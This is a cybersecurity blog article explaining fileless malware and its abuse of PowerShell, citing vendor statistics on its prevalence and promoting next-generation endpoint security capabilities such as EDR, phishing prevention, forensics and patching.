How to Stop Fileless Malware: A Deep Dive for Enterprises

How to Stop Fileless Malware: A Deep Dive for Enterprises

How can enterprises stop fileless malware?

This is far from an idle question. Fileless malware constitutes one of the most pressing and dangerous threats enterprises face today. While ransomware and cryptocurrency mining malware continue to pose a serious digital risk to businesses, none compare to the potential of fileless malware.

So what is fileless malware? And how can adopting next-gen endpoint security help you stop fileless malware? Which capabilities should enterprises value more in preventing these attacks? We answer these questions and more.   

What is Fileless Malware?

Fileless malware describes a variety of cyber attacks which don’t operate in the same manner as traditional malware.

Usually, traditional malware requires the download of a malicious file onto the enterprise’s network. From this file, traditional malware can trigger their codes and programs, achieving their nefarious goals and spreading throughout the network.

Thankfully, most legacy endpoint security solutions utilize signature-based threat detection and prevention. This type of detection can discover malicious files on on networks and remove them. However, fileless malware doesn’t require a file download to operate—much to the peril of legacy endpoint security solutions.

Fileless malware can steal passwords, data, browsing history, and enterprise finances. Additionally, fileless malware can allow hackers to engage in lateral attacks, granting them an unmonitored foothold in your enterprise network. Furthermore, a fileless malware attack can disrupt business processes, commandeer endpoints, and conduct other kinds of digital infiltration.

How Does Fileless Malware Function?

Instead, fileless malware exploits native processes on your enterprise endpoints themselves. Usually, this involves leveraging PowerShell, a task automation and configuration management framework. PowerShell operates entirely on memory and doesn’t require installed files to function.

At its core, fileless malware can piggyback off the PowerShell scripts as it runs those functions. In other words, these cyber attacks embed malicious scripts into the regular scripts. By doing so, hackers can conceal their attacks, disguising them as extensions of normal processes.     

PowerShell is a legitimate process on your endpoints. It handles routine administrative and maintenance related tasks; you can’t just turn it off (without causing serious damage to your processes). Moreover, their functions are considered normal baseline behaviors; they don’t rouse traditional endpoint security or behavior analytics alerts.

Additionally, you can’t stop good actors from using the native processing hackers exploit with these cyber attacks. Thus, fileless malware exploits what essentially serve as perpetual backdoors into your networks. It leaves no footprints, and any system reboot essentially erases what evidence of the attack lingers.   

How Common are Fileless Malware Attacks?

To understand how to stop fileless malware, you first need to understand how common fileless malware has become in recent years. Thankfully, several cybersecurity vendors and researchers explore the infection rates of this new breed of cyber attack. And not a moment too soon either; hackers have adopted fileless malware attacks only too readily.  

According to the Symantec Internet Security Threat Report for February 2019, malicious Powershell script attacks rose over 1000% in 2018. Endpoint security solution provider Carbon Black found fileless malware accounts for more than 50% of successful enterprise breaches. 97% of their customers have experienced a fileless malware attack over the past two years. In particular, PowerShell accounts for 89% of fileless malware attacks.

Meanwhile, fellow endpoint security provider FireEye previously found 90% of blocked attacks contained malware-less threats. 81% of blocked fileless malware email attacks came in the form of phishing.

Ransomware and cryptojacking continue to battle for the position of top cyber attack. But fileless malware is on the rise, and many enterprises aren’t prepared for it.     

How to Stop Fileless Malware

To stop fileless malware, you need endpoint security capabilities specifically designed to help mitigate this family of cyber attacks. This requires a next-generation endpoint security solution; legacy endpoint protection platforms can’t keep up with the demands of modern hackers.

Here are the EPP capabilities you need to stop fileless malware:     

EDR

Endpoint detection and response (EDR) provides another layer of threat detection to your digital perimeter, allowing your solution to stop threats which circumvent your threat prevention. EDR can help detect fileless malware as they enact their malicious programs through continuous monitoring.

Most next-gen endpoint security solutions possess EDR capabilities; Gartner ranked it as one of the most critical capabilities in EPP solutions.     

Phishing Prevention and Email Security

To stop fileless malware, you need to take the steps to stop phishing attacks. As illustrated above, phishing attacks and fileless malware tend to go hand in hand. Your endpoint security solution should work to block as many phishing emails from entering your network in the first place.

Phishing attacks exploit employee’s ignorance and neglect on cybersecurity best practices. The best way to prevent a critical mistake is to remove the possibility in the first place. Additionally, your endpoint security solution should help monitor incoming and outgoing network traffic to watch for potential intrusions.     

Forensic Investigation

If you aim to stop fileless malware attacks, you need to investigate where the attack came from and how it exploited your processes. This requires extensive visibility into your entire network which only next-gen endpoint security can provide. Furthermore, it requires the ability to investigate—which includes the ability to track threat progression throughout the network accurately.   

Also, investigation requires maintaining and monitoring operations like Window Management Instrumentation and PowerShell to identify any unwanted task in real-time.    

Patches and Upgrades

Your endpoint security solution must ensure your endpoints, processes, and applications receive proper patches and upgrades for as long as they remain a part of your IT environment. These patches and upgrades carry the essential threat intelligence necessary to stop fileless malware.

For example, the latest PowerShell version protects itself more adequately against fileless malware. Your enterprise cannot neglect patches—even a slight delay can result in a zero-day attack.

Plenty of next-gen endpoint security solutions offer endpoint management capabilities, including patch management, which helps your enterprise stay up to date with necessary upgrades.

You can learn more about how to stop fileless malware with endpoint security with our 2019 Buyer’s Guide. We explore the top vendors in the market and their key features, and we share our Bottom Line on each.

Follow me

Ben Canner

Editor, Cybersecurity at Solutions Review
Ben Canner is an enterprise technology writer and analyst covering Identity Management, SIEM, Endpoint Protection, and Cybersecurity writ large. He holds a Bachelor of Arts Degree in English from Clark University in Worcester, MA. He previously worked as a corporate blogger and ghost writer. You can reach him via Twitter and LinkedIn.
Ben Canner
Follow me

Leave a Reply

Your email address will not be published. Required fields are marked *